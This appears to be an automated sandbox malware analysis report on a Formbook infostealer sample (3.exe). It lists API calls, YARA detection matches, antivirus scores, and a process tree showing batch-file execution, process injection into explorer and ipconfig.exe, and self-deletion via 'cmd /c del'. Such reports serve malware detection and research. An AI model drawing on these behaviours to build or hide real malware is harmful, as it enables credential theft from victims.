          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9560 NtWriteFile,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001281B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00128260 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001282E0 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001282DA NtClose,
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230A098
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309FC2
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309FC2
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309C70
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309C70
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230A098
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309FC2
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309FC2
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309C70
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309C70
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041BBCF
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041C38B
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00408C4C
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00408C50
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041B493
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041C573
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041CE28
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041BEFB
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041CF7E
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041C7EA
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041BFAB
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B720A8
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB090
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B728EC
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7E824
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61002
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAF900
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B722AE
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5FA2B
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADEBB0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B523E3
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6DBD2
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B603DA
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADABD8
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B72B28
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACAB40
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB841F
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6D466
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2581
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABD5E0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B725DD
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA0D20
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B72D07
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B71D55
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B72EF7
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC6E30
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6D616
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B71FF1
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C722AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB236
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C5FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C603DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C523E3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD138B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDABD8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C4CB4F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C72B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCAB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C728EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C720A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA830
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C61002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C7E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BC99BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BC4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BAF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C72EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BC6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C7DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C71FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64496
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BB841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB477
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C725DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C62D82
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C71D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C72D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00111030
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012C38B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00118C50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00118C4C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012B493
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012C573
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00112D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00112D87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012CE28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012CF7E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00112FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012BFAA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012C7EA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02BAB150 appears 136 times
          Source: C:\Users\user\Desktop\3.exeCode function: String function: 00AAB150 appears 90 times
          Source: C:\Users\user\Desktop\3.exeCode function: String function: 0230A358 appears 40 times
          Source: C:\Users\user\Desktop\3.exeCode function: String function: 02305898 appears 48 times
          Source: C:\Users\user\Desktop\3.exeCode function: String function: 02304D43 appears 56 times
          Source: 3.exeStatic PE information: invalid certificate
          Source: 3.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: 3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 3.exe, 00000001.00000003.242843726.0000000000866000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3.exe
          Source: 3.exe, 00000001.00000002.303149513.000000000066E000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs 3.exe
          Source: 3.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.217187289.0000000003088000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215422596.0000000003068000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215851322.0000000003084000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.215763701.000000000306C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.215525181.0000000003080000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.216098891.0000000003098000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215441416.0000000003084000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@14/5@14/5
          Source: C:\Users\user\Desktop\3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:204:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4816:120:WilError_01
          Source: C:\Users\user\Desktop\3.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Users\user\Desktop\3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 3.exeVirustotal: Detection: 58%
          Source: 3.exeMetadefender: Detection: 42%
          Source: 3.exeReversingLabs: Detection: 75%
          Source: C:\Users\user\Desktop\3.exeFile read: C:\Users\user\Desktop\3.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\3.exe 'C:\Users\user\Desktop\3.exe'
          Source: C:\Users\user\Desktop\3.exeProcess created: C:\Users\user\Desktop\3.exe C:\Users\user\Desktop\3.exe
          Source: C:\Users\user\Desktop\3.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\3.exeProcess created: C:\Users\user\Desktop\3.exe C:\Users\user\Desktop\3.exe
          Source: C:\Users\user\Desktop\3.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3.exe'
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: 3.exeStatic file information: File size 1081696 > 1048576
          Source: Binary string: ipconfig.pdb source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 3.exe, 00000001.00000003.242702997.0000000000750000.00000004.00000001.sdmp, ipconfig.exe, 00000013.00000002.468141767.0000000002C9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 3.exe, ipconfig.exe
